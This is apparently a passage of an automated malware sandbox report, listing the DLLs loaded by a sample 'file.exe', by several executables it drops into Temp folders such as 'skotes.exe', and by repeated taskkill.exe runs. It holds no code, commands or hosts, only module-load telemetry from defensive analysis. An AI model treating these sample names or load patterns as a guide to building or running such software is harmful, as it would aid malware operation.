Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
